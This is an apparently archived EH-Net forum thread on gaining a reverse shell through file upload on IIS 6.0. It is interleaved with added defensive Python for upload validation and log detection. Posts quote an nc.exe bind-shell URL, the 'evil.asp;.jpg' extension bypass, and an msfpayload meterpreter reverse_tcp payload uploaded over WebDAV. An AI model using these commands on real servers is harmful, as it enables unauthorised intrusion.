EH-Net
Topic: Reverse shell on IIS 6.0 (Read 19757 times)
mn_kthompson
Jr. Member
Posts: 58
« on: September 18, 2007, 11:17:40 AM »

I'll try to keep the backstory short on this.  We have an outside vendor that has developed a web-based application for one of our departments.  The application allows the logged on user to upload files into a directory that is accessible to the web server.  In other words, you can upload a file, and then point your browser at that file.  We have some concerns about this, so I decided to set up a test machine to test a potential vulnerability. 

I have set up IIS 6.0 on a virtual machine running a fully patched evaluation version of Windows Server 2003 and I set some ridiculously wide open permissions on the folder and whipped up an ASP.NET application that lets an anonymous user upload any file to the wwwroot directory.  I have verified that I was able to upload cmd.exe and nc.exe to the wwwroot directory.

The problem is, I can't seem to do anything with those files that I uploaded.  I have made sure that everyone has execute permission on the wwwroot folder, but I still can't seem to get a reverse shell.  I can't even seem to get a directory listing.  I tried putting this into my browser:
Code:
http://134.29.32.249/cmd.exe?dir+c:\

but I keep getting a page cannot be displayed error.  I also tried:
Code:
http://134.29.32.249/nc.exe?-l+-p+1001+-e+cmd.exe
which also hasn't worked.  Does anyone know IIS well enough to tell me what I've done wrong here?  Is there some setting that I haven't opened up so that the web server can run the exe?  Is there something wrong with the http request that I've sent to the server?
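The test described in the post above works because the client chooses the file name and the file lands inside wwwroot, where IIS will serve or execute it. The following is an added example of the server-side controls a defender would put on such an upload handler; it is not code from the original post or from the vendor application it describes. WEBROOT, UPLOAD_DIR, the allow-list and the function names are this example's own assumptions.

```python
"""Hardened handling of user uploads (added example, not from the thread).

The controls modelled here break the upload-then-browse chain regardless of
what IIS does with a given name: an allow-list of extensions checked against
every dotted segment, rejection of the characters IIS 6 (';' truncation) and
NTFS (':' alternate data streams) treat specially, a server-generated file
name, and storage in a directory verified to sit outside the web root.
"""
import re
import secrets
from pathlib import PureWindowsPath

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Extensions a script engine or the OS would execute on IIS 6 / Windows.
EXECUTABLE_EXTENSIONS = {"asp", "aspx", "asa", "ashx", "asmx", "cer", "cdx",
                         "exe", "dll", "com", "bat", "cmd", "vbs", "js", "config"}
# ';' (IIS 6 handler mapping), ':' (NTFS streams), path separators, control
# characters, and characters Windows refuses in file names anyway.
FORBIDDEN = re.compile(r'[;:\\/\x00-\x1f<>"|?*]')

WEBROOT = PureWindowsPath(r"C:\Inetpub\wwwroot")             # assumed layout
UPLOAD_DIR = PureWindowsPath(r"C:\Inetpub\uploads_private")  # not under WEBROOT


class RejectedUpload(ValueError):
    """Raised for any name or destination the policy does not accept."""


def validate_upload_name(client_name: str) -> str:
    """Return the vetted extension of a client-supplied name, or raise."""
    base = PureWindowsPath(client_name).name   # drop any path the client sent
    base = base.rstrip(". ")                   # Windows silently strips these
    if not base:
        raise RejectedUpload("empty or relative name")
    if FORBIDDEN.search(base):
        raise RejectedUpload(f"forbidden character in {client_name!r}")
    segments = base.lower().split(".")
    if len(segments) < 2:
        raise RejectedUpload("no extension")
    ext = segments[-1]
    if ext not in ALLOWED_EXTENSIONS:
        raise RejectedUpload(f"extension .{ext} not allowed")
    # "evil.asp.jpg"-style names: refuse an executable token in any position.
    if any(seg in EXECUTABLE_EXTENSIONS for seg in segments[1:-1]):
        raise RejectedUpload("executable extension embedded in name")
    return ext


def looks_like_jpeg(data: bytes) -> bool:
    """Magic-byte check: necessary but not sufficient.  A JPEG header with a
    script appended passes it, which is why the name and storage rules never
    rely on content sniffing alone."""
    return data[:3] == b"\xff\xd8\xff"


def server_side_name(client_name: str) -> str:
    """Discard the client's name entirely; keep only the vetted extension."""
    return f"{secrets.token_hex(16)}.{validate_upload_name(client_name)}"


def storage_path(client_name: str,
                 upload_dir: PureWindowsPath = UPLOAD_DIR) -> PureWindowsPath:
    """Destination for the file.  Fails closed if the upload directory is (or
    is under) the web root, so a misconfiguration cannot turn uploads into URLs."""
    target = upload_dir / server_side_name(client_name)
    if target == WEBROOT or WEBROOT in target.parents:
        raise RejectedUpload("upload directory must not be under the web root")
    return target
```

The point of `storage_path` is that the directory check is enforced in code rather than left to NTFS ACLs alone: the test machine in the post had "ridiculously wide open permissions", and a control that lives in the application survives that kind of drift on the file system.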
LSOChris
Guest
« Reply #1 on: September 18, 2007, 04:47:06 PM »

try using the cmdasp.asp file

http://net-square.com/papers/one_way/one_way.html

it will execute as the IIS6 instance, so no SYSTEM privs but you should still be able to get a shell
rebrov
Full Member
Posts: 130
« Reply #2 on: June 12, 2010, 02:26:35 AM »

Quote from: LSOChris on September 18, 2007, 04:47:06 PM
try using the cmdasp.asp file

http://net-square.com/papers/one_way/one_way.html

it will execute as the IIS6 instance, so no SYSTEM privs but you should still be able to get a shell

I was about to make a new thread asking how to do this exploit, how to get a shell on an IIS 6.0 server??

I tried to figure out the way on this site you mentioned, but no luck.

Is there any proper way to do it? I mean more explanation from you?
xXxKrisxXx
Hero Member
Posts: 512
« Reply #3 on: June 12, 2010, 11:43:40 AM »

Maybe this may help - it's directly from ChrisG's blog
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html

eCPPT, GCIH, OSCP, OSWP
rebrov
Full Member
Posts: 130
« Reply #4 on: June 13, 2010, 07:47:55 PM »

Quote from: xXxKrisxXx on June 12, 2010, 11:43:40 AM
Maybe this may help - it's directly from ChrisG's blog
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html

Thanks a lot for the info, and I want to ask some things:

I found a link on the same page leading to some tips useful to me, as follows:

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

At this part, after I created the fake jpg file (which is really an .asp script) to upload to the web server, he said upload this file to the server??

1- How to upload the file to the server?
2- How to know that it takes this directory at the server, /images/?
3- And should I navigate to this directory location via browser? Or a specific port via telnet?
4- What should I do if the server doesn't allow users to upload?

I hope you can answer these questions because it's going to enlighten me a lot.

Thanks in advance.
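The `evil.asp;.jpg` trick quoted in the post above works because IIS 6 stops reading the file name at the semicolon when it picks a handler, so the "image" is run as ASP. From the defender's side, the same quirk is easy to spot in the web server's own logs. The following detection logic is an added example, not code from the thread or from the blog post it quotes; it runs over constructed IIS 6 W3C-format log entries (the IP addresses, user agents and timestamps are made up, while the path names mirror the ones used in this thread), and UPLOAD_DIRS is an assumption about which directories hold user uploads.

```python
"""Detection of upload and WebDAV abuse patterns in IIS 6 W3C logs (added
example, not from the thread).  Four rules:

  semicolon-in-path     ';' in a requested path (raw or as %3b) is a strong
                        signal, since IIS 6 hands "x.asp;.jpg" to the ASP engine.
  script-in-upload-dir  a script or executable token in any dotted segment of
                        a name under an upload directory ("evil.asp.jpg" too).
  executable-request    the final extension is an OS executable type, e.g.
                        /cmd.exe with a command in the query string.
  webdav-write          a WebDAV write method that the server accepted.
"""
from urllib.parse import unquote

UPLOAD_DIRS = ("/images/", "/davaroo/")       # assumed upload locations
SCRIPT_EXT = {"asp", "aspx", "asa", "ashx", "asmx", "cer", "cdx"}
EXEC_EXT = {"exe", "dll", "com", "bat", "cmd"}
WEBDAV_WRITE = {"PUT", "COPY", "MOVE", "MKCOL", "PROPPATCH", "DELETE"}

# Constructed sample log; field layout follows the IIS W3C extended format.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2010-06-13 19:50:01 10.0.0.5 GET /images/logo.jpg - 80 - 10.0.0.20 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2010-06-13 19:50:07 10.0.0.5 GET /images/evil.asp;.jpg - 80 - 10.0.0.20 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2010-06-13 19:50:13 10.0.0.5 GET /cmd.exe dir+c:\ 80 - 10.0.0.20 Mozilla/4.0+(compatible;+MSIE+6.0) 404 0 2
2010-06-13 19:50:20 10.0.0.5 PUT /davaroo/tcp443meterp.txt - 80 - 10.0.0.20 cadaver/0.23.3 201 0 0
2010-06-13 19:50:25 10.0.0.5 COPY /davaroo/tcp443meterp.txt - 80 - 10.0.0.20 cadaver/0.23.3 201 0 0
2010-06-13 19:50:31 10.0.0.5 GET /davaroo/tcp443meterp.asp%3b.txt - 80 - 10.0.0.20 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2010-06-13 19:50:40 10.0.0.5 GET /images/photo.jpg - 80 - 10.0.0.20 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
"""


def parse_w3c(text):
    """Yield one dict per entry; the #Fields directive names the columns."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#") or fields is None:
            continue
        values = raw.split()
        if len(values) != len(fields):
            continue          # malformed entry; worth counting in production
        yield dict(zip(fields, values))


def name_segments(stem):
    """Dotted segments of the final path component, treating ';' as a
    separator so "evil.asp;.jpg" yields ["evil", "asp", "", "jpg"]."""
    base = stem.rsplit("/", 1)[-1].lower()
    return base.replace(";", ".").split(".")


def classify(row):
    """Return the list of rule names the entry triggers (empty if benign)."""
    stem = unquote(row["cs-uri-stem"])    # %3b and friends become literal
    segs = name_segments(stem)
    hits = []
    if ";" in stem:
        hits.append("semicolon-in-path")
    if stem.startswith(UPLOAD_DIRS) and any(
            s in SCRIPT_EXT or s in EXEC_EXT for s in segs[1:]):
        hits.append("script-in-upload-dir")
    if segs[-1] in EXEC_EXT:
        hits.append("executable-request")
    if row["cs-method"].upper() in WEBDAV_WRITE and 200 <= int(row["sc-status"]) < 300:
        hits.append("webdav-write")
    return hits


def scan(text):
    """(time, client ip, rule, raw stem) for every rule hit in the log."""
    return [(row["time"], row["c-ip"], rule, row["cs-uri-stem"])
            for row in parse_w3c(text) for rule in classify(row)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The stem is percent-decoded before matching because, as the cadaver session quoted later in this thread shows, the semicolon travels over WebDAV as `%3b`; matching only the literal character would miss that copy. The `webdav-write` rule fires on the successful PUT and COPY even though the file names involved look harmless, which is the event a defender wants to see before any `;` request arrives.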
rebrov
Full Member
Posts: 130
« Reply #5 on: June 13, 2010, 07:56:30 PM »

I found it at the page:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
    ./msfencode -o tcp443meterp.asp
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

    upload it and rename it

    dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
    Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
    Progress: [=============================>] 100.0% of 314810 bytes succeeded.
    dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
    Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt':  succeeded.
    dav:/davaroo/> exit

He uploaded it to the server via what? Telnet? At the part:

    dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt

Where do I type these commands? I don't understand this part clearly.
xXxKrisxXx
Hero Member
Posts: 512
« Reply #6 on: June 13, 2010, 08:25:47 PM »

He used a WebDAV client called cadaver to upload the file. He provided a reference link below in his blog, but you could get it here. You could use the WebDAV auxiliary modules to verify it's up and running.

To try to answer some of your questions above:
1- How to upload the file to the server?
A. If FTP allows anonymous access and allows you to upload files, that'd be good. WebDAV also allows you to upload files - look into cadaver.
2- How to know that it takes this directory at the server, /images/?
A. You could use a tool like nikto to find out what type of files are allowed to get uploaded. One of the WebDAV auxiliary modules may also give you some information regarding this.
3- And should I navigate to this directory location via browser? Or a specific port via telnet?
A. Reference Answer 1.
4- What should I do if the server doesn't allow users to upload?
A. Try Harder™
« Last Edit: June 13, 2010, 08:44:43 PM by xXxKrisxXx »

eCPPT, GCIH, OSCP, OSWP
rebrov
Full Member
Posts: 130
« Reply #7 on: June 13, 2010, 10:49:59 PM »

What if WebDAV is disabled? I found many exploits, but most of them talk about exploiting via WebDAV.

But what if I can't go via WebDAV because it's disabled?
LSOChris
Guest
« Reply #8 on: June 19, 2010, 08:47:41 AM »

I've reread this post a few times to try to find the question, but I think you are asking about other ways to get files on the server.

Obviously the blog post is about exploiting WebDAV shares or writeable shares via normal Windows networking. You could also use some of those techniques if a site allows file uploads as well. The same caveats would *usually* apply, that you can't upload .exe or .asp(x) files; in that case the bypass method may still work for you.

Hope that helps

© 2013 The Ethical Hacker Network